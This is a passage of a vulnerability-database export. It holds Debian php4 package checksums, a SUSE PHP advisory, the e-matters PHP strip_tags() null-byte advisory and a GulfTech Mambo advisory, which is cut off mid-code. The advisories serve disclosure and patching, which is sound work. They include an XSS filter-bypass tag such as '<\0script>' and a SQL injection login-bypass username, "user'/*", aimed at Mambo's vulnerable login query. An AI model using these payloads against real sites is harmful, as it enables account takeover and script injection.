http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_ia64.deb\n Size/MD5 checksum: 18340 cd8632e4a9110b7d3156dad85690a6ce\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_ia64.deb\n Size/MD5 checksum: 26186 c7ad5a75ed36df56351a65c41348edf3\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_ia64.deb\n Size/MD5 checksum: 37874 07e01a0c9cdb699fef4f50ca3c4f01e2\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_ia64.deb\n Size/MD5 checksum: 43988 fc6b95ff73332f7c61c8417140a648d3\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_ia64.deb\n Size/MD5 checksum: 22544 e57cba8d1b426eefabff3c42a29ff987\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_ia64.deb\n Size/MD5 checksum: 20066 346fc6f69cb9e3ee52f049a3b842d510\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_ia64.deb\n Size/MD5 checksum: 7554 20529194648e1c6258773f47651b8acf\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_ia64.deb\n Size/MD5 checksum: 22464 68590d876f4d5a2f263a316a193e78d8\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_ia64.deb\n Size/MD5 checksum: 32762 c811c0fb085af31e406b520744be7e2f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_ia64.deb\n Size/MD5 checksum: 6332 1e2f732f1043a8549129a6e0e6f12d7a\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_ia64.deb\n Size/MD5 checksum: 8670 e64f30804af8958dd176b8aad272361d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_ia64.deb\n Size/MD5 checksum: 20432 b68e9e0e36ae000f8dc41fa42506a3a3\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_ia64.deb\n Size/MD5 checksum: 40600 78824ab12097974b4fb94b0aa52f7612\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_hppa.deb\n Size/MD5 checksum: 757632 a53b2945221459fdbb2ee357010bd0a5\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_hppa.deb\n Size/MD5 checksum: 734948 83499589f4a4036361b9d807554ca511\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_hppa.deb\n Size/MD5 checksum: 1213064 189161f812c31312e7d727112b2bf147\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_hppa.deb\n Size/MD5 checksum: 15592 eb38355f392fa822d83002fb9895faae\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_hppa.deb\n Size/MD5 checksum: 22752 272fa4ad3504c515f6f9b1e1d41702e1\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_hppa.deb\n Size/MD5 checksum: 31478 c0ed1b02f90838e86b7d16b540662287\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_hppa.deb\n Size/MD5 checksum: 37468 2eeb295f949ab27afe2f49808d97b03a\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_hppa.deb\n Size/MD5 checksum: 19014 851037835a8062235563872cd1b5e3ab\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_hppa.deb\n Size/MD5 checksum: 17308 a1961e334fd48914b2b60b4c0c4f4cf6\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_hppa.deb\n Size/MD5 checksum: 6054 9895e855736f15e73b4d550ad7b213aa\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_hppa.deb\n Size/MD5 checksum: 17944 1f697f5ee13decfd0e3724c917718661\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_hppa.deb\n Size/MD5 checksum: 26650 175be2edde4f64531db223d24047115c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_hppa.deb\n Size/MD5 checksum: 5556 1178c6d0349c29416544ac9842e362e7\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_hppa.deb\n Size/MD5 checksum: 7282 71deb167c557104f4c8cb7971547bdcb\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_hppa.deb\n Size/MD5 checksum: 16530 5f6d169d5a749a9df9ea31bad9066866\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_hppa.deb\n Size/MD5 checksum: 26896 a9a6408b92c54469b17dba497d557b42\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_m68k.deb\n Size/MD5 checksum: 581282 0f17fd2d508e6d5674d46707a116bfb7\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_m68k.deb\n Size/MD5 checksum: 573512 6ae23885aebbb2faa20a006b370845eb\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_m68k.deb\n Size/MD5 checksum: 933174 a6eef170b81baa66febc240e40867af9\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_m68k.deb\n Size/MD5 checksum: 13400 7f68cdc359b3b84d74930d3de6192b12\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_m68k.deb\n Size/MD5 checksum: 18586 146eeafc93705a28c078ac7ec49f8df1\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_m68k.deb\n Size/MD5 checksum: 23828 f425eaa3c3d27727e149ff856b79e5a5\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_m68k.deb\n Size/MD5 checksum: 27866 122f5992e09a8424f3c1ae06a21dc980\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_m68k.deb\n Size/MD5 checksum: 14598 7241d33d363f2ce36c5441a9f4011961\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_m68k.deb\n Size/MD5 checksum: 14012 a77f41bb2fc355e0521e164ceeb4f673\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_m68k.deb\n Size/MD5 checksum: 5406 5b543a58c9d9797e821a27d08aff8c44\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_m68k.deb\n Size/MD5 checksum: 15054 9e4998629168ff95d6256e2f6e752dba\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_m68k.deb\n Size/MD5 checksum: 20692 e0e443af4d0098759841708a43bd9f49\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_m68k.deb\n Size/MD5 checksum: 4932 21614b51c3e9503490b7201596ad839e\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_m68k.deb\n Size/MD5 checksum: 6522 c19a7d435b3056fa994441bca8f6214b\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_m68k.deb\n Size/MD5 checksum: 13366 03f426b6cdaf6d395402f45bd15c9d87\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_m68k.deb\n Size/MD5 checksum: 24974 03f3c1ce268ac4ad6a0104d1e6c772cb\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_mips.deb\n Size/MD5 checksum: 615750 4c1209c85e7401835aae6a3329240553\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_mips.deb\n Size/MD5 checksum: 607714 78a9139a8fa06d1e680923b13b436b64\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_mips.deb\n Size/MD5 checksum: 1096296 b282343f4fc9a13cc1100b741f203193\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_mips.deb\n Size/MD5 checksum: 12098 cc0d8ac156103b42402b66aa393c41b6\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_mips.deb\n Size/MD5 checksum: 16818 d6f7ee6777004af562ebfabef0b96ebf\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_mips.deb\n Size/MD5 checksum: 24738 cffc7e92544c769275bb8e4cc4e58a2e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_mips.deb\n Size/MD5 checksum: 27336 07a961a879d665fe0e1863d9b18ef399\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_mips.deb\n Size/MD5 checksum: 15020 4ac32d6bf85703946e259f53e445fa9e\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_mips.deb\n Size/MD5 checksum: 13014 db75faad2baac30bfd5357623c7656a8\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_mips.deb\n Size/MD5 checksum: 5620 ac0251cfe399c4c962188a7184bc9136\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_mips.deb\n Size/MD5 checksum: 15218 6c1dfec9dffcb7a3ccceef8995d5348c\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_mips.deb\n Size/MD5 checksum: 20762 6a73fcd24bf63ee5f0e4093b7047461c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_mips.deb\n Size/MD5 checksum: 5074 b2dec7935a3a80778979cbef863b4550\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_mips.deb\n Size/MD5 checksum: 6576 35a994eaec936890d6b29d6768d68589\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_mips.deb\n Size/MD5 checksum: 14086 df6b2c1940d2f77a00955a50ff9df081\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_mips.deb\n Size/MD5 checksum: 25458 2569efbd1cfd9adbe49900cdf25cfb08\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 610094 cb0b71cf0ec1cacdffd3742f792d851c\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 603302 a4dae23da0d1fd296964c05cf27543bf\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 1090356 b182d01cc6c599dba597567497d01adb\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 12006 3e5dd433d31b51a1423ba0984e9249f9\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 16706 6605e3ff54ac9e4569277810d56aa7bd\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 24536 e35d0e718869d00b8732a1bf9de6deef\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 27100 e493d4a8dbd612e6ae203f3ea8bcf2ba\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 14924 e92f474dff931dcf0db335e05a1e5df5\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 12896 56c57a81ff1bc698bc11596b398b2896\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 5570 cb1c7aacd1b4cbd8938f9534812e86bb\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 15094 1955b17be8f0a9a64e3240e581878b5f\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 20630 c0756f788c1cb056d4d079503fd58040\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 5024 173286b2f4bf91a193e466329244f367\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 6490 5ede938f2d34d62699218819a155eaec\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 14048 6e73d61eb2330d8702b862f880799d89\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_mipsel.deb\n Size/MD5 checksum: 25220 adecf566d6ac9d4820d6a983e5819e74\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 653284 2d014ab535b3b06ba6f18aeb24be96a4\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 638298 dece49f25d774895c0ddb70d66050e9f\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 1071430 0bfd974295aa3979d29757c26eac501c\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 13674 3ebc0c74907cb1ec0b1508d455da36f4\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 20916 79376d3a799be760e33833b5075ec115\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 28112 ced35d8d467056d1bb91d856414aa2af\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 31308 6d363392c00d592bc1f130da31314da2\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 16278 6533691066d81fbcd10b6b3806aa2d63\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 15022 4d66232e0b3cac7bdf0b981470fad788\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 5622 e737d2c08858c6da95faf4f9e5693245\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 16054 11e80ba5ae80da36b9f1b79927383067\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 23762 277314f85bec23c5cb889f2e78c7a92d\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 5074 66b800b972cc49c0c723ed354516f2de\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 6544 626622b6f1d29584d0c3d798edac8749\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 14444 c386cb37759068f33f94c2312f6bb5e7\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_powerpc.deb\n Size/MD5 checksum: 26952 8df784ff58836b667d08a5eacaf6bd9d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_s390.deb\n Size/MD5 checksum: 640852 dc5694e483c8652b8d058df1a4cb0a7a\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_s390.deb\n Size/MD5 checksum: 629594 637ec6321e2c30a48901fd0269b2932a\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_s390.deb\n Size/MD5 checksum: 1017256 3a6468ea9f587c100e6171fa48aad977\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_s390.deb\n Size/MD5 checksum: 12994 421b993b2947b0c9f56d6806743a5b58\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_s390.deb\n Size/MD5 checksum: 19136 138602b1fe4c4c53bc0c753344ba68b9\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_s390.deb\n Size/MD5 checksum: 25708 9a70cf4d0091afe6cbc32e68c756666e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_s390.deb\n Size/MD5 checksum: 29592 61e035b0cb0219cbe4869e0270e8a078\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_s390.deb\n Size/MD5 checksum: 16114 44bc1c571c4914e8e8677e1b47d1786a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_s390.deb\n Size/MD5 checksum: 13394 b7a01dcfb37266585e84eda817f0561b\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_s390.deb\n Size/MD5 checksum: 5716 a84ef089d97cc9b1273322bf251f6981\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_s390.deb\n Size/MD5 checksum: 16508 bf1e3e15b335b6125a1022bb12a2e75b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_s390.deb\n Size/MD5 checksum: 22402 b0d4848432a9162c0917e62062e9032f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_s390.deb\n Size/MD5 checksum: 5144 0a1bbf5ef26d72ef092a65a2699dad34\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_s390.deb\n Size/MD5 checksum: 7214 ffdbd47465b2c33a99e15f57f9188556\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_s390.deb\n Size/MD5 checksum: 14496 7ac687c02da66a742e9623e497b5e586\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_s390.deb\n Size/MD5 checksum: 25812 b98fda5b0b3588400150ebc9e6fab5a6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_sparc.deb\n Size/MD5 checksum: 629810 735b7214924510917fea8c677dbde6ec\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_sparc.deb\n Size/MD5 checksum: 615086 ce16ac9c4b8783ef055ef8111cfcdca6\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_sparc.deb\n Size/MD5 checksum: 1033126 1feea9d22ecb17ca303d8332d87e5e9d\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_sparc.deb\n Size/MD5 checksum: 13460 a2e7af958294d9f4da06dcfd0e76f556\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_sparc.deb\n Size/MD5 checksum: 18684 112c76304934655d118c20aa4b8e3384\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_sparc.deb\n Size/MD5 checksum: 25852 1bec1d801a9ef1bb591ce6304d16981d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_sparc.deb\n Size/MD5 checksum: 33212 be1a481906a6cf43060c0616a7f6a98c\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_sparc.deb\n Size/MD5 checksum: 18172 7f57929fa7562d1079cac743b5c031c9\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_sparc.deb\n Size/MD5 checksum: 17550 08127b3b4c7e5ae54db6e1707d1b83df\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_sparc.deb\n Size/MD5 checksum: 5760 874896cc801f2e90240994ca8a972801\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_sparc.deb\n Size/MD5 checksum: 18320 32b35fdf942644392764e533ddffca47\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_sparc.deb\n Size/MD5 checksum: 22306 157af9fcbbcc7da57bb131535b5406d7\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_sparc.deb\n Size/MD5 checksum: 7676 380d81d9792d19b4737afde9eb5cfbcb\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_sparc.deb\n Size/MD5 checksum: 6774 4e75f00d2f7ce177dcb5d52c5439f967\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_sparc.deb\n Size/MD5 checksum: 13652 55ca2f11ba890609ad1ba8844383b829\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_sparc.deb\n Size/MD5 checksum: 22826 0691be269852e077b84be167d960f14c\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2004-07-20T00:00:00", "published": "2004-07-20T00:00:00", "id": "DEBIAN:DSA-531-1:B45B2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html", "title": "[SECURITY] [DSA 531-1] New php4 packages fix multiple vulnerabilities", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:22:50", "bulletinFamily": "unix", "description": "PHP is a well known, widely-used scripting language often used within web server setups. Stefan Esser found a problem with the \"memory_limit\" handling of PHP which allows remote attackers to execute arbitrary code as the user running the PHP interpreter. This problem has been fixed. Additionally a problem within the \"strip_tags\" function has been found and fixed which allowed remote attackers to inject arbitrary tags into certain web browsers, issuing XSS related attacks. Since there is no easy workaround except disabling PHP, we recommend an update for users running the PHP interpreter within the apache web server.", "modified": "2004-07-16T12:43:18", "published": "2004-07-16T12:43:18", "id": "SUSE-SA:2004:021", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00004.html", "title": "remote code execution in php4/mod_php4", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: PHP strip_tags() bypass vulnerability\r\n Release Date: 2004/07/14\r\nLast Modified: 2004/07/14\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: PHP <= 4.3.7\r\n PHP5 <= 5.0.0RC3\r\n Severity: A binary safety problem within PHP's strip_tags() \r\n function may allow injection of arbitrary tags \r\n in Internet Explorer and Safari browsers\r\n Risk: Moderate\r\nVendor Status: Vendor has released a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/122004.html\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n According to Security Space PHP is the most popular Apache module\r\n and is installed on about 50% of all Apaches worldwide. This figure\r\n includes of course only those servers that are not configured with\r\n expose_php=Off.\r\n \r\n During an audit of the PHP source code a binary safety problem in\r\n the handling of allowed tags within PHP's strip_tags() function\r\n was discovered. This problem may allow injection of f.e. Javascript\r\n in Internet Explorer and Safari browsers.\r\n \r\n\r\nDetails:\r\n \r\n Many sites stop XSS attacks by striping unsafe HTML tags from the\r\n user's input. PHP scripts usually implement this functionality\r\n with the strip_tags() function. This function takes a optional\r\n second parameter to specify tags that should not get stripped\r\n from the input.\r\n \r\n $example = strip_tags($_REQUEST['user_input'], "<b><i><s>");\r\n \r\n Due to a binary safety problem within the allowed tags handling\r\n attacker supplied tags like: <\0script> or <s\0cript> will pass \r\n the check and wont get stripped. (magic_quotes_gpc must be Off)\r\n \r\n In a perfect world this would be no dangerous problem because\r\n such tags are either in the allowed taglist or should get \r\n ignored by the browser because they have no meaning in HTML.\r\n \r\n In the real world however MS Internet Explorer and Safari filter\r\n '\0' characters from the tag and accept them as valid. Quite\r\n obvious that this can not only lead to a number of XSS issues \r\n on sites that filter dangerous tags with PHP's strip_tags() but\r\n also on every other site that filters them with pattern matching\r\n and is not necessary running PHP.\r\n\r\n According to tests:\r\n\r\n - Opera\r\n - Konqueror\r\n - Mozilla\r\n - Mozilla Firefox\r\n - Epiphany\r\n \r\n are NOT affected by this.\r\n \r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability\r\n to the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 26. June 2004 - Problem found and fixed in CVS\r\n 14. July 2004 - Public Disclosure\r\n\r\n \r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0595 to this issue.\r\n\r\n\r\nRecommendation:\r\n\r\n Because Internet Explorer is out of all reason still the most used\r\n browser fixing this problem within your PHP version is strongly\r\n recommended.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFA9Ic7b31XLTAExLwRAq6eAJ4j5AomlAJUhEHoDmLwCk4RqvJlVgCgqIN7\r\nD9N75IutqIcoce4xqJTw6XQ=\r\n=Q5NT\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "SECURITYVULNS:DOC:6483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6483", "title": "[Full-Disclosure] Advisory 12/2004: PHP strip_tags() bypass vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "##########################################################\r\n# GulfTech Security Research February 24, 2006\r\n##########################################################\r\n# Vendor : Miro International Pty Ltd\r\n# URL : http://www.mamboserver.com/\r\n# Version : Mambo <= 4.5.3h\r\n# Risk : Multiple Vulnerabilities\r\n##########################################################\r\n\r\n\r\n\r\nDescription:\r\nMambo is a popular Open Source Content Management System\r\nreleased under the GNU General Public license (GNU GPL).\r\nThere are a number of security issues in Mambo which allows\r\nfor SQL Injection, Authentication Bypass, and possible remote\r\ncode execution via local file inclusion. There has been an\r\nupdated version of Mambo released and all users are advised\r\nto upgrade as soon as possible. Also, please note that these\r\nvulnerabilities are NOT related to any worms currently taking\r\nadvantage of vulnerable Mambo installations.\r\n\r\n\r\n\r\nSQL Injection:\r\nThere are several SQL Injection issues in Mambo Open Source.\r\nThe easiest to exploit of the issues allows an attacker to\r\nlogin as any user. The only info the attacker has to have is\r\nthe target username (if no user is specified, the first user\r\nfrom the users table will be selected instead).\r\n\r\n\r\nfunction login( $username=null,$passwd=null ) {\r\nglobal $acl;\r\n\r\n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' );\r\n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' );\r\nif (!$username || !$passwd) {\r\n $username = trim( mosGetParam( $_POST, 'username', '' ) );\r\n $passwd = trim( mosGetParam( $_POST, 'passwd', '' ) );\r\n $passwd = md5( $passwd );\r\n $bypost = 1;\r\n}\r\n$remember = trim( mosGetParam( $_POST, 'remember', '' ) );\r\n\r\nif (!$username || !$passwd) {\r\n echo "<script> alert(\""._LOGIN_INCOMPLETE."\"); window.\r\n history.go(-1); </script>\n";\r\n exit();\r\n} else {\r\n $this->_db->setQuery( "SELECT id, gid, block, usertype"\r\n . "\nFROM #__users"\r\n . "\nWHERE username='$username' AND password='$passwd'"\r\n );\r\n $row = null;\r\n if ($this->_db->loadObject( $row )) {\r\n if ($row->block == 1) {\r\n echo "<script>alert(\""._LOGIN_BLOCKED."\"); window.\r\n history.go(-1); </script>\n";\r\n exit();\r\n }\r\n // fudge the group stuff\r\n $grp = $acl->getAroGroup( $row->id );\r\n $row->gid = 1;\r\n\r\n if ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) ||\r\n $acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) {\r\n // fudge Authors, Editors, Publishers and Super Administrators\r\n into the Special Group\r\n $row->gid = 2;\r\n }\r\n \r\n\r\nThe above code is from mosMainFrame class (/includes/mambo.php)\r\nand is the source of the previously mentioned problem. The\r\nfunction mosGetParam() for the most part just imports GPC\r\nvariables, and has no real effective filtering or the like, so\r\nseveral variables shown above contain unsanitized data. These\r\nvariables include $username, which is shortly thereafter passed\r\nto the query, thus allowing a user to bypass a login by supplying\r\na username of "user'/*" and any password. This is a very serious\r\nissue, but should prove easy to fix by either adding better\r\nfiltering in the mosGetParam() or sanitizing the data within the\r\nlogin() function, or both. If a malicious user is able to use this\r\nvulnerability to gain admin privileges then it is pretty much\r\ngame over as an attacker could then upload, and install a malicious\r\nmodule and execute any php code of their choice on the server.\r\n\r\nAnother issue with Mambo Open Source is data passed to the\r\nmosMenuCheck() function is usually unsanitized in regards to the\r\n$task parameter.\r\n\r\nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {\r\nglobal 